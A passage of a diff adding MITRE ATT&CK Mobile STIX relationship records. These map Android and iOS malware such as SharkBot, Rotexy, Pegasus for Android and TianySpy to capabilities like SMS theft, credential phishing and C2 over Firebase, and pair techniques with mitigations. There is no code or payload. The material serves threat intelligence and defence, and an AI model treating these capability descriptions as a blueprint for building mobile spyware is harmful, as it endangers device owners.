"url": "https://blog.lookout.com/blog/2016/01/06/brain-test-re-emerges/", + "description": "Chris Dehghanpoor. (2016, January 6). Brain Test re-emerges: 13 apps found in Google Play Read more: Brain Test re-emerges: 13 apps found in Google Play. Retrieved December 21, 2016." + } + ], + "x_mitre_deprecated": false, + "revoked": false, + "description": "[BrainTest](https://attack.mitre.org/software/S0293) provided capabilities that allowed developers to use compromised devices to post positive reviews on their own malicious applications as well as download other malicious applications they had submitted to the Play Store.(Citation: Lookout-BrainTest)", + "modified": "2022-04-19T14:25:41.669Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "relationship_type": "uses", + "source_ref": "malware--e13d084c-382f-40fd-aa9a-98d69e20301e", + "target_ref": "attack-pattern--a8e971b8-8dc7-4514-8249-ae95427ec467", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--242dc659-c205-4e9e-95f9-14fee66195af", + "created": "2022-04-01T15:29:36.082Z", + "x_mitre_version": "0.1", + "x_mitre_deprecated": false, + "revoked": false, + "description": "Configuration of per-app VPN policies instead of device-wide VPN can restrict access to internal enterprise resource access via VPN to only enterprise-approved applications", + "modified": "2022-04-01T15:29:36.082Z", + "relationship_type": "mitigates", + "source_ref": "course-of-action--649f7268-4c12-483b-ac84-4b7bca9fe2ee", + "target_ref": "attack-pattern--22379609-a99f-4a01-bd7e-70f3e105859d", + "x_mitre_attack_spec_version": "2.1.0", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--7ec3ee9a-6710-46ed-aecb-c0f2a64739ad", + "type": "relationship", + "created": "2020-11-20T16:37:28.429Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "Symantec GoldenCup", + "url": "https://symantec-enterprise-blogs.security.com/blogs/expert-perspectives/goldencup-new-cyber-threat-targeting-world-cup-fans", + "description": "R. Iarchy, E. Rynkowski. (2018, July 5). GoldenCup: New Cyber Threat Targeting World Cup Fans. Retrieved October 29, 2020." + } + ], + "modified": "2020-11-20T16:37:28.429Z", + "description": "[Golden Cup](https://attack.mitre.org/software/S0535) can collect images, videos, and attacker-specified files.(Citation: Symantec GoldenCup)", + "relationship_type": "uses", + "source_ref": "malware--f3975cc0-72bc-4308-836e-ac701b83860e", + "target_ref": "attack-pattern--e1c912a9-e305-434b-9172-8a6ce3ec9c4a", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--3dff770d-9627-4647-b945-7f24a97b2273", + "type": "relationship", + "created": "2019-09-15T15:26:22.926Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "modified": "2020-06-24T15:02:13.533Z", + "description": "An EMM/MDM can use the Android `DevicePolicyManager.setPermittedAccessibilityServices` method to set an explicit list of applications that are allowed to use Android's accessibility features.", + "relationship_type": "mitigates", + "source_ref": "course-of-action--649f7268-4c12-483b-ac84-4b7bca9fe2ee", + "target_ref": "attack-pattern--d1f1337e-aea7-454c-86bd-482a98ffaf62", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--a1023a75-31cc-420a-9c59-b440f7fb27e6", + "type": "relationship", + "created": "2019-11-21T16:42:48.501Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "description": "GReAT. (2019, June 26). ViceLeaker Operation: mobile espionage targeting Middle East. Retrieved November 21, 2019.", + "url": "https://securelist.com/fanning-the-flames-viceleaker-operation/90877/", + "source_name": "SecureList - ViceLeaker 2019" + }, + { + "source_name": "Bitdefender - Triout 2018", + "url": "https://labs.bitdefender.com/2018/08/triout-spyware-framework-for-android-with-extensive-surveillance-capabilities/", + "description": "L. Arsene, C. Ochinca. (2018, August 20). Triout – Spyware Framework for Android with Extensive Surveillance Capabilities. Retrieved January 21, 2020." + } + ], + "modified": "2020-01-21T14:20:50.492Z", + "description": "[ViceLeaker](https://attack.mitre.org/software/S0418) can collect location information, including GPS coordinates.(Citation: SecureList - ViceLeaker 2019)(Citation: Bitdefender - Triout 2018)", + "relationship_type": "uses", + "source_ref": "malware--6fcaf9b0-b509-4644-9f93-556222c81ed2", + "target_ref": "attack-pattern--99e6295e-741b-4857-b6e5-64989eb039b4", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--ad76b0ad-fa76-4d56-8a6e-8818bbc6509e", + "created": "2022-03-30T18:07:07.306Z", + "x_mitre_version": "0.1", + "x_mitre_deprecated": false, + "revoked": false, + "description": "On iOS, the `allowEnterpriseAppTrust` and `allowEnterpriseAppTrustModification` configuration profile restrictions can be used to prevent users from installing apps signed using enterprise distribution keys. ", + "modified": "2022-03-30T18:07:07.306Z", + "relationship_type": "mitigates", + "source_ref": "course-of-action--649f7268-4c12-483b-ac84-4b7bca9fe2ee", + "target_ref": "attack-pattern--79cb02f4-ac4e-4335-8b51-425c9573cce1", + "x_mitre_attack_spec_version": "2.1.0", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--c58a26af-cc4c-41a2-b884-9a4fa8a2ad5c", + "type": "relationship", + "created": "2019-09-04T15:38:56.946Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "FlexiSpy-Features", + "url": "https://www.flexispy.com/en/features-overview.htm", + "description": "FlexiSpy. (n.d.). FlexiSpy Monitoring Features. Retrieved September 4, 2019." + } + ], + "modified": "2019-09-10T14:59:26.136Z", + "description": " [FlexiSpy](https://attack.mitre.org/software/S0408) can retrieve a list of installed applications.(Citation: FlexiSpy-Features) ", + "relationship_type": "uses", + "source_ref": "tool--1622fd3d-fcfc-4d02-ac49-f2d786f79b81", + "target_ref": "attack-pattern--198ce408-1470-45ee-b47f-7056050d4fc2", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--13efc415-5e17-4a16-81c2-64e74815907f", + "created": "2017-12-14T16:46:06.044Z", + "x_mitre_version": "1.0", + "external_references": [ + { + "source_name": "PaloAlto-XcodeGhost", + "url": "http://researchcenter.paloaltonetworks.com/2015/09/update-xcodeghost-attacker-can-phish-passwords-and-open-urls-though-infected-apps/", + "description": "Claud Xiao. (2015, September 18). Update: XcodeGhost Attacker Can Phish Passwords and Open URLs through Infected Apps. Retrieved December 21, 2016." + } + ], + "x_mitre_deprecated": false, + "revoked": false, + "description": "[XcodeGhost](https://attack.mitre.org/software/S0297) can prompt a fake alert dialog to phish user credentials.(Citation: PaloAlto-XcodeGhost)", + "modified": "2022-04-12T10:01:44.682Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "relationship_type": "uses", + "source_ref": "malware--d9e07aea-baad-4b68-bdca-90c77647d7f9", + "target_ref": "attack-pattern--4c58b7c6-a839-4789-bda9-9de33e4d4512", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--d22d309b-ab00-4f17-b6bf-7706f499cc5e", + "type": "relationship", + "created": "2019-09-03T19:45:48.489Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "SWB Exodus March 2019", + "url": "https://securitywithoutborders.org/blog/2019/03/29/exodus.html", + "description": "Security Without Borders. (2019, March 29). Exodus: New Android Spyware Made in Italy. Retrieved September 3, 2019." + } + ], + "modified": "2019-09-11T13:25:19.128Z", + "description": "[Exodus](https://attack.mitre.org/software/S0405) Two can extract the GPS coordinates of the device.(Citation: SWB Exodus March 2019)", + "relationship_type": "uses", + "source_ref": "malware--3049b2f2-e323-4cdb-91cb-13b37b904cbb", + "target_ref": "attack-pattern--99e6295e-741b-4857-b6e5-64989eb039b4", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--fada5ba5-7449-4878-b555-82f225473c8b", + "created": "2022-03-30T19:28:42.179Z", + "x_mitre_version": "0.1", + "x_mitre_deprecated": false, + "revoked": false, + "description": "Attestation can detect unauthorized modifications to devices. Mobile security software can then use this information and take appropriate mitigation action. ", + "modified": "2022-03-30T19:28:42.179Z", + "relationship_type": "mitigates", + "source_ref": "course-of-action--ff4821f6-5afb-481b-8c0f-26c28c0d666c", + "target_ref": "attack-pattern--0d4e3bbb-7af5-4c88-a215-0c0906bc1e8d", + "x_mitre_attack_spec_version": "2.1.0", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--271a311f-71bc-4558-a314-0edfbec44b64", + "type": "relationship", + "created": "2019-11-21T16:42:48.495Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "SecureList - ViceLeaker 2019", + "url": "https://securelist.com/fanning-the-flames-viceleaker-operation/90877/", + "description": "GReAT. (2019, June 26). ViceLeaker Operation: mobile espionage targeting Middle East. Retrieved November 21, 2019." + } + ], + "modified": "2019-11-21T16:42:48.495Z", + "description": "[ViceLeaker](https://attack.mitre.org/software/S0418) collects device information, including the device model and OS version.(Citation: SecureList - ViceLeaker 2019)", + "relationship_type": "uses", + "source_ref": "malware--6fcaf9b0-b509-4644-9f93-556222c81ed2", + "target_ref": "attack-pattern--e2ea7f6b-8d4f-49c3-819d-660530d12b77", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--085f8397-0233-42d7-855e-3dbd709f2eca", + "created": "2023-01-18T21:39:27.823Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "nccgroup_sharkbot_0322", + "description": "RIFT: Research and Intelligence Fusion Team. (2022, March 3). SharkBot: a “new” generation Android banking Trojan being distributed on Google Play Store. Retrieved January 18, 2023.", + "url": "https://research.nccgroup.com/2022/03/03/sharkbot-a-new-generation-android-banking-trojan-being-distributed-on-google-play-store/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-03-27T18:30:43.093Z", + "description": "[SharkBot](https://attack.mitre.org/software/S1055) can use the Android “Direct Reply” feature to spread the malware to other devices. It can also download the full version of the malware after initial device compromise.(Citation: nccgroup_sharkbot_0322)", + "relationship_type": "uses", + "source_ref": "malware--9cd72f5c-bec0-4f7e-bb6d-296937116291", + "target_ref": "attack-pattern--6c49d50f-494d-4150-b774-a655022d20a6", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--f84355c2-b829-4324-821a-b5148734bb6b", + "created": "2022-04-01T15:21:35.655Z", + "x_mitre_version": "0.1", + "x_mitre_deprecated": false, + "revoked": false, + "description": "Users should be wary of granting applications dangerous or privacy-intrusive permissions, such as access to microphone or audio output. ", + "modified": "2022-04-01T15:21:35.655Z", + "relationship_type": "mitigates", + "source_ref": "course-of-action--653492e3-27be-4a0e-b08c-938dd2b7e0e1", + "target_ref": "attack-pattern--6683aa0c-d98a-4f5b-ac57-ca7e9934a760", + "x_mitre_attack_spec_version": "2.1.0", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--e84ad4b0-9f7a-48a5-89ae-33804b11eb56", + "created": "2017-12-14T16:46:06.044Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "Lookout-PegasusAndroid", + "description": "Mike Murray. (2017, April 3). Pegasus for Android: the other side of the story emerges. Retrieved April 16, 2017.", + "url": "https://blog.lookout.com/blog/2017/04/03/pegasus-android/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-04-05T17:12:22.002Z", + "description": "[Pegasus for Android](https://attack.mitre.org/software/S0316) accesses contact list information.(Citation: Lookout-PegasusAndroid)", + "relationship_type": "uses", + "source_ref": "malware--93799a9d-3537-43d8-b6f4-17215de1657c", + "target_ref": "attack-pattern--e0b9ecb8-a7d1-43c7-aa30-8e19c6a92c86", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--a92a805e-d5f5-4e94-8592-c253e03e4476", + "created": "2022-03-31T19:51:15.415Z", + "x_mitre_version": "0.1", + "external_references": [ + { + "source_name": "Android Package Visibility", + "url": "https://developer.android.com/training/package-visibility", + "description": "Google. (n.d.). Package visibility filtering on Android. Retrieved April 11, 2022." + } + ], + "x_mitre_deprecated": false, + "revoked": false, + "description": "Android 11 introduced privacy enhancements to package visibility, filtering results that are returned from the package manager. iOS 12 removed the private API that could previously be used to list installed applications on non-app store applications.(Citation: Android Package Visibility)", + "modified": "2022-04-11T19:19:34.658Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "relationship_type": "mitigates", + "source_ref": "course-of-action--0beabf44-e8d8-4ae4-9122-ef56369a2564", + "target_ref": "attack-pattern--1d44f529-6fe6-489f-8a01-6261ac43f05e", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--9398bf9d-be77-4ac2-acea-893152cafd16", + "created": "2022-03-30T14:43:46.034Z", + "x_mitre_version": "0.1", + "x_mitre_deprecated": false, + "revoked": false, + "description": "", + "modified": "2022-03-30T14:43:46.034Z", + "relationship_type": "revoked-by", + "source_ref": "attack-pattern--bd4d32f5-eed4-4018-a649-40b229dd1d69", + "target_ref": "attack-pattern--3775a580-a1d1-46c4-8147-c614a715f2e9", + "x_mitre_attack_spec_version": "2.1.0", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--a95fe853-d1d1-47dc-a776-b905daacfe32", + "created": "2020-06-26T20:16:32.181Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "ESET DEFENSOR ID", + "description": "L. Stefanko. (2020, May 22). Insidious Android malware gives up all malicious features but one to gain stealth. Retrieved June 26, 2020.", + "url": "https://www.welivesecurity.com/2020/05/22/insidious-android-malware-gives-up-all-malicious-features-but-one-gain-stealth/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-04-05T20:11:53.609Z", + "description": "[DEFENSOR ID](https://attack.mitre.org/software/S0479) has used Firebase Cloud Messaging for C2.(Citation: ESET DEFENSOR ID) ", + "relationship_type": "uses", + "source_ref": "malware--5a5dca4c-03c1-4b99-bfcf-c206e20aa663", + "target_ref": "attack-pattern--2282a98b-5049-4f61-9381-55baca7c1add", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--66fb8a34-9d48-4599-a56e-19b057380030", + "created": "2023-03-20T18:46:08.304Z", + "revoked": false, + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-03-20T18:46:08.304Z", + "description": "", + "relationship_type": "detects", + "source_ref": "x-mitre-data-component--85a533a4-5fa4-4dba-b45d-f0717bedd6e6", + "target_ref": "attack-pattern--c6e17ca2-08b5-4379-9786-89bd05241831", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.1.0", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--e9d5992e-04ef-4835-87df-cf6434dcabbc", + "created": "2023-03-20T18:49:38.917Z", + "revoked": false, + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-03-20T18:49:38.917Z", + "description": "", + "relationship_type": "detects", + "source_ref": "x-mitre-data-component--5ae32c6a-2d12-4b8f-81ca-f862f2be0962", + "target_ref": "attack-pattern--8605a0ec-b44a-4e98-a7fc-87d4bd3acb66", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.1.0", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--146275c0-b6dd-4700-bded-bc361a67d023", + "type": "relationship", + "created": "2020-09-14T14:13:45.253Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "Lookout eSurv", + "url": "https://blog.lookout.com/esurv-research", + "description": "A. Bauer. (2019, April 8). Lookout discovers phishing sites distributing new iOS and Android surveillanceware. Retrieved September 11, 2020." + } + ], + "modified": "2020-09-14T14:13:45.253Z", + "description": "[eSurv](https://attack.mitre.org/software/S0507) can record audio.(Citation: Lookout eSurv)", + "relationship_type": "uses", + "source_ref": "malware--680f680c-eef9-4f8a-b5f5-f451bf47e403", + "target_ref": "attack-pattern--6683aa0c-d98a-4f5b-ac57-ca7e9934a760", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--3abc80ad-4ea0-4e91-a170-f040469c2083", + "type": "relationship", + "created": "2020-07-20T13:27:33.483Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "Talos-WolfRAT", + "url": "https://blog.talosintelligence.com/2020/05/the-wolf-is-back.html", + "description": "W. Mercer, P. Rascagneres, V. Ventura. (2020, May 19). The wolf is back... . Retrieved July 20, 2020." + } + ], + "modified": "2020-08-10T21:57:54.688Z", + "description": "[WolfRAT](https://attack.mitre.org/software/S0489) can take photos and videos.(Citation: Talos-WolfRAT)", + "relationship_type": "uses", + "source_ref": "malware--dfdac962-9461-47f0-a212-36dfce2a97e6", + "target_ref": "attack-pattern--d8940e76-f9c1-4912-bea6-e21c251370b6", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--f622a267-7a58-4082-a3f5-10e9bb549a5e", + "created": "2022-03-30T20:43:31.249Z", + "x_mitre_version": "0.1", + "x_mitre_deprecated": false, + "revoked": false, + "description": "", + "modified": "2022-03-30T20:43:31.249Z", + "relationship_type": "revoked-by", + "source_ref": "attack-pattern--8197f026-64da-4700-93b9-b55ba55f3b31", + "target_ref": "attack-pattern--e422b6fa-4739-46b9-992e-82f1b350c780", + "x_mitre_attack_spec_version": "2.1.0", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--b30fa851-75cf-46ac-aa1b-cfa8b7f36545", + "created": "2019-09-23T13:36:08.429Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "securelist rotexy 2018", + "description": "T. Shishkova, L. Pikman. (2018, November 22). The Rotexy mobile Trojan – banker and ransomware. Retrieved September 23, 2019.", + "url": "https://securelist.com/the-rotexy-mobile-trojan-banker-and-ransomware/88893/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-04-05T16:56:23.365Z", + "description": "[Rotexy](https://attack.mitre.org/software/S0411) processes incoming SMS messages by filtering based on phone numbers, keywords, and regular expressions, focusing primarily on banks, payment systems, and mobile network operators. [Rotexy](https://attack.mitre.org/software/S0411) can also send a list of all SMS messages on the device to the command and control server.(Citation: securelist rotexy 2018)", + "relationship_type": "uses", + "source_ref": "malware--0626c181-93cb-4860-9cb0-dff3b1c13063", + "target_ref": "attack-pattern--c6421411-ae61-42bb-9098-73fddb315002", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--f6a451e8-2125-4bbe-be52-e682523cd169", + "type": "relationship", + "created": "2018-10-17T00:14:20.652Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "url": "https://researchcenter.paloaltonetworks.com/2017/07/unit42-spydealer-android-trojan-spying-40-apps/", + "description": "Wenjun Hu, Cong Zheng and Zhi Xu. (2017, July 6). SpyDealer: Android Trojan Spying on More Than 40 Apps. Retrieved September 18, 2018.", + "source_name": "PaloAlto-SpyDealer" + } + ], + "modified": "2019-10-15T19:37:21.273Z", + "description": "[SpyDealer](https://attack.mitre.org/software/S0324) harvests the device phone number, IMEI, and IMSI.(Citation: PaloAlto-SpyDealer)", + "relationship_type": "uses", + "source_ref": "malware--86fc6f0c-86d9-473e-89f3-f50f3cb9319b", + "target_ref": "attack-pattern--d4536441-1bcc-49fa-80ae-a596ed3f7ffd", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--36298fd6-d909-4490-8a04-095aef9ffafe", + "type": "relationship", + "created": "2020-11-20T15:54:07.747Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "Symantec GoldenCup", + "url": "https://symantec-enterprise-blogs.security.com/blogs/expert-perspectives/goldencup-new-cyber-threat-targeting-world-cup-fans", + "description": "R. Iarchy, E. Rynkowski. (2018, July 5). GoldenCup: New Cyber Threat Targeting World Cup Fans. Retrieved October 29, 2020." + } + ], + "modified": "2020-11-20T15:54:07.747Z", + "description": "[Golden Cup](https://attack.mitre.org/software/S0535) can record audio from the microphone and phone calls.(Citation: Symantec GoldenCup) ", + "relationship_type": "uses", + "source_ref": "malware--f3975cc0-72bc-4308-836e-ac701b83860e", + "target_ref": "attack-pattern--6683aa0c-d98a-4f5b-ac57-ca7e9934a760", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--2caddf52-2bc2-4f75-90bb-0f292952ada6", + "created": "2023-01-19T18:07:26.323Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "trendmicro_tianyspy_0122", + "description": "Trend Micro. (2022, January 25). TianySpy Malware Uses Smishing Disguised as Message From Telco. Retrieved January 11, 2023.", + "url": "https://www.trendmicro.com/en_us/research/22/a/tianyspy-malware-uses-smishing-disguised-as-message-from-telco.html" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-03-29T21:13:32.345Z", + "description": "[TianySpy](https://attack.mitre.org/software/S1056) can utilize WebViews to display fake authentication pages that capture user credentials.(Citation: trendmicro_tianyspy_0122) ", + "relationship_type": "uses", + "source_ref": "malware--fd6d56b2-d84e-4d2a-b37d-d4678d3e08a6", + "target_ref": "attack-pattern--4c58b7c6-a839-4789-bda9-9de33e4d4512", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--ccfffa97-17fd-4826-9a16-c9d8174fb8ac", + "type": "relationship", + "created": "2020-01-27T17:05:58.237Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "description": "E. Xu, G. Guo. (2019, June 28). Mobile Cyberespionage Campaign ‘Bouncing Golf’ Affects Middle East. Retrieved January 27, 2020.", + "url": "https://blog.trendmicro.com/trendlabs-security-intelligence/mobile-cyberespionage-campaign-bouncing-golf-affects-middle-east/", + "source_name": "Trend Micro Bouncing Golf 2019" + } + ], + "modified": "2020-01-27T17:05:58.237Z", + "description": "[GolfSpy](https://attack.mitre.org/software/S0421) can obtain the device’s battery level, network operator, connection information, sensor information, and information about the device’s storage and memory.(Citation: Trend Micro Bouncing Golf 2019)", + "relationship_type": "uses", + "source_ref": "malware--c19cfc89-5ac6-4d2d-a236-70d2b32e007c", + "target_ref": "attack-pattern--e2ea7f6b-8d4f-49c3-819d-660530d12b77", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--83991b5c-59b9-4fe5-9ef2-39c6ddc8b835", + "type": "relationship", + "created": "2017-12-14T16:46:06.044Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "Kaspersky-WUC", + "description": "Costin Raiu, Denis Maslennikov, Kurt Baumgartner. (2013, March 26). Android Trojan Found in Targeted Attack. Retrieved December 23, 2016.", + "url": "https://securelist.com/android-trojan-found-in-targeted-attack-58/35552/" + } + ], + "modified": "2019-10-15T19:54:10.285Z", + "description": "[Android/Chuli.A](https://attack.mitre.org/software/S0304) gathered system information including phone number, OS version, phone model, and SDK version.(Citation: Kaspersky-WUC)", + "relationship_type": "uses", + "source_ref": "malware--d05f7357-4cbe-47ea-bf83-b8604226d533", + "target_ref": "attack-pattern--e2ea7f6b-8d4f-49c3-819d-660530d12b77", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": 